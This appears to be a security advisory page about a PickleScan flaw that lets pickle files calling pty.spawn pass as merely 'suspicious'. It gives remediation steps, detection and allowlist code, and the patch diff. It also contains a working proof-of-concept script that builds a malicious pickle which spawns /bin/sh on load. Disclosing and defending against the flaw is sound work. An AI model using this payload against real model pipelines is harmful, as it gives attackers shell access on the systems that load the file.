
GHSA-hgrh-qx5j-jfwx HIGH
Published December 29, 2025
CISO Take

Any organization using PickleScan as a security gate for ML model ingestion — particularly PyTorch models from HuggingFace or internal model registries — must upgrade to picklescan >= 0.0.33 immediately. The critical failure is that PickleScan classifies pty.spawn as 'suspicious' rather than 'dangerous', meaning automated pipelines may auto-approve malicious models, creating a false sense of security worse than no scanner at all. Patch now, audit your model registry for files scanned with older versions, and mandate SafeTensors as a longer-term architectural control.

Affected Systems

| Package | Ecosystem | Vulnerable Range | Patched |
|------------|-----------|------------------|---------|
| picklescan | pip | < 0.0.33 | 0.0.33 |

Do you use picklescan? You're affected.

Severity & Risk

CVSS 3.1
8.8 / 10
EPSS
N/A
KEV Status
Not in KEV
Sophistication
Trivial

Recommended Action

  1. PATCH (immediate): pip install --upgrade 'picklescan>=0.0.33' across all environments: dev, CI/CD, and production scanners. Verify with picklescan --version.
  2. AUDIT: Re-scan your model registry with the patched scanner, covering every file ingested between your last picklescan version bump and your upgrade date. Flag any file that previously returned 'suspicious' on pty globals.
  3. WORKAROUND (if upgrade is blocked): Manually patch scanner.py to add 'pty': {'spawn'} to the _unsafe_globals dict, as shown in the advisory diff.
  4. DETECT: Grep model files for the byte sequence 'pty\nspawn' (the pickled GLOBAL opcode pattern).
  5. HARDEN: Mandate the SafeTensors format for all model distribution to eliminate pickle deserialization risk entirely. Layer defenses; never treat a single scanner as a sufficient control for untrusted model ingestion.
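The DETECT step's grep can be sketched in a few lines of Python. This is a heuristic sketch, not PickleScan: `SIGNATURE`, `_blobs`, and `flag_pickle_files` are hypothetical names, the pattern only matches the protocol-0 GLOBAL encoding of pty.spawn (STACK_GLOBAL payloads store the module and name as separate strings and need opcode-level parsing), and ZIP members are unpacked because PyTorch .pt checkpoints are ZIP archives.

```python
import io
import os
import zipfile

# Protocol-0 GLOBAL encoding of pty.spawn inside a pickle stream.
SIGNATURE = b"pty\nspawn\n"

def _blobs(path):
    """Yield the raw file bytes plus each ZIP member (PyTorch .pt files are ZIPs)."""
    with open(path, "rb") as f:
        data = f.read()
    yield data
    if zipfile.is_zipfile(io.BytesIO(data)):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for member in zf.namelist():
                yield zf.read(member)

def flag_pickle_files(root):
    """Yield paths under `root` whose contents contain the pty.spawn pattern."""
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            if any(SIGNATURE in blob for blob in _blobs(path)):
                yield path
```

Treat a hit as a reason to quarantine and inspect, not as proof of compromise; a clean result from this grep alone is not a reason to skip the patched scanner.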

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Art. 15 - Accuracy, robustness and cybersecurity of high-risk AI systems
ISO 42001
8.4 - AI system risk controls — third-party and supply chain
A.6.2 - AI system supply chain and third-party components
NIST AI RMF
GOVERN 1.7 - Processes for delineating AI risk responsibilities
MANAGE 2.4 - Mechanisms to sustain effectiveness of risk mitigations
MAP 5.2 - Practices and capabilities to detect AI system failures and vulnerabilities
OWASP LLM Top 10
LLM03 - Supply Chain Vulnerabilities

Technical Details

NVD Description

### Summary

The vulnerability allows malicious actors to bypass PickleScan's unsafe-globals check, leading to potential arbitrary code execution. The issue stems from the absence of the `pty` library (more specifically, of the `pty.spawn` function) from PickleScan's list of unsafe globals. This allows attackers to disguise malicious pickle payloads within files that would otherwise be flagged by pickle-based threat scanning.

### Details

For 2025's [HeroCTF](https://heroctf.fr/), there was a challenge named Irreductible 2 where players needed to bypass the latest versions of PickleScan and [Fickling](https://github.com/trailofbits/fickling/) to gain code execution. The challenge [writeup](https://github.com/HeroCTF/HeroCTF_v7/blob/master/Misc/Irreductible-2/README.md), [files](https://github.com/HeroCTF/HeroCTF_v7/tree/master/Misc/Irreductible-2) and [solve script](https://github.com/HeroCTF/HeroCTF_v7/blob/master/Misc/Irreductible-2/solve.py) have all been released. The intended path was `pty.spawn`, though some players found alternative solutions.

### PoC

Run the following Python code to generate the PoC pickle file. (The opcode constants live in the `pickle` module, but the byte packing comes from `struct`.)

```py
import pickle
import struct

command = b"/bin/sh"

payload = b"".join(
    [
        pickle.PROTO + struct.pack("B", 4),  # protocol 4 header
        pickle.MARK,
        pickle.GLOBAL + b"pty\n" + b"spawn\n",  # push pty.spawn onto the stack
        pickle.EMPTY_LIST,
        pickle.SHORT_BINUNICODE + struct.pack("B", len(command)) + command,
        pickle.APPEND,
        # Additional arguments can be passed by repeating the
        # SHORT_BINUNICODE + APPEND opcodes
        pickle.OBJ,  # calls pty.spawn(["/bin/sh"]) on load
        pickle.STOP,
    ]
)

with open("dump.pkl", "wb") as f:
    f.write(payload)
```

Then run PickleScan on the generated pickle file. PickleScan detects the `pty.spawn` global as "suspicious" but not "dangerous", allowing it to be loaded.
### Impact

**Severity**: High

**Affected Users**: Any organization (such as HuggingFace) or individual using PickleScan to analyze PyTorch models, or other files distributed as ZIP archives, for malicious pickle content.

**Impact Details**: Attackers can craft malicious PyTorch models containing embedded pickle payloads and bypass the PickleScan check by using the `pty.spawn` function. This could lead to arbitrary code execution on the user's system when these malicious files are processed or loaded.

### Suggested Patch

```diff
diff --git a/src/picklescan/scanner.py b/src/picklescan/scanner.py
index 34a5715..b434069 100644
--- a/src/picklescan/scanner.py
+++ b/src/picklescan/scanner.py
@@ -150,6 +150,7 @@ _unsafe_globals = {
     "_pickle": "*",
     "pip": "*",
     "profile": {"Profile.run", "Profile.runctx"},
+    "pty": "spawn",
     "pydoc": "pipepager",  # pydoc.pipepager('help','echo pwned')
     "timeit": "*",
     "torch._dynamo.guards": {"GuardBuilder.get"},
```
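The class of bug here, a denylist keyed on (module, name) pairs that silently misses an entry, can be illustrated with a minimal opcode-level checker built on the standard library's `pickletools`. This is a sketch, not PickleScan's implementation: `UNSAFE` and `unsafe_globals` are hypothetical names, and the denylist contents are illustrative, merely mirroring the shape of the _unsafe_globals dict shown in the advisory diff.

```python
import pickletools

# Illustrative denylist mirroring the shape of picklescan's _unsafe_globals:
# "*" bans every attribute of a module; a set bans specific names.
UNSAFE = {
    "builtins": {"eval", "exec"},
    "os": "*",
    "pty": {"spawn"},  # the entry missing before picklescan 0.0.33
}

def unsafe_globals(payload: bytes):
    """Return the (module, name) pairs in a pickle stream that hit the denylist."""
    hits = []
    strings = []  # string constants seen so far, consumed by STACK_GLOBAL
    for op, arg, _pos in pickletools.genops(payload):
        if op.name == "GLOBAL":
            # genops reports the GLOBAL argument as "module name" in one string.
            module, name = arg.rsplit(" ", 1)
        elif op.name == "STACK_GLOBAL" and len(strings) >= 2:
            module, name = strings[-2], strings[-1]
        else:
            if op.name in ("SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"):
                strings.append(arg)
            continue
        banned = UNSAFE.get(module)
        if banned == "*" or (banned is not None and name in banned):
            hits.append((module, name))
    return hits
```

The point of the sketch is the failure mode: any (module, name) pair absent from the dict passes silently, which is exactly how `pty.spawn` slipped through.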

Exploitation Scenario

An adversary targeting an organization that ingests PyTorch models from HuggingFace Hub or an internal model registry crafts a malicious .pkl checkpoint using the public PoC — a 10-line Python script embedding pty.spawn('/bin/sh') as the pickle payload. The file is submitted as a legitimate-looking model. PickleScan runs in the CI/CD pipeline, classifies pty.spawn as 'suspicious' (not 'dangerous'), and the automated gate approves the file. When a data scientist or inference server loads the checkpoint, pty.spawn executes, granting the attacker an interactive shell — likely on a GPU training server or production inference endpoint with access to proprietary model weights, S3 buckets, and cloud IAM credentials.
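The load step in this scenario is the last line of defense. The restricted-Unpickler pattern from the Python `pickle` documentation inverts the scanner's denylist into an allowlist, so an unlisted global such as `pty.spawn` fails closed instead of slipping through. A minimal sketch follows; `ALLOWED`, `RestrictedUnpickler`, and `restricted_loads` are illustrative names, and the allowlist entries are examples rather than a vetted set for real checkpoints.

```python
import io
import pickle

# Illustrative allowlist: only these (module, name) pairs may be resolved.
ALLOWED = {
    ("collections", "OrderedDict"),
}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called for every GLOBAL/STACK_GLOBAL; unknown pairs fail closed.
        if (module, name) not in ALLOWED:
            raise pickle.UnpicklingError(f"forbidden global: {module}.{name}")
        return super().find_class(module, name)

def restricted_loads(data: bytes):
    """Deserialize `data`, refusing any global not in ALLOWED."""
    return RestrictedUnpickler(io.BytesIO(data)).load()
```

Even with this in place, prefer SafeTensors for distribution: an allowlist over pickle is a containment measure, not a safe format.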

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Timeline

Published
December 29, 2025
Last Modified
December 29, 2025
First Seen
March 24, 2026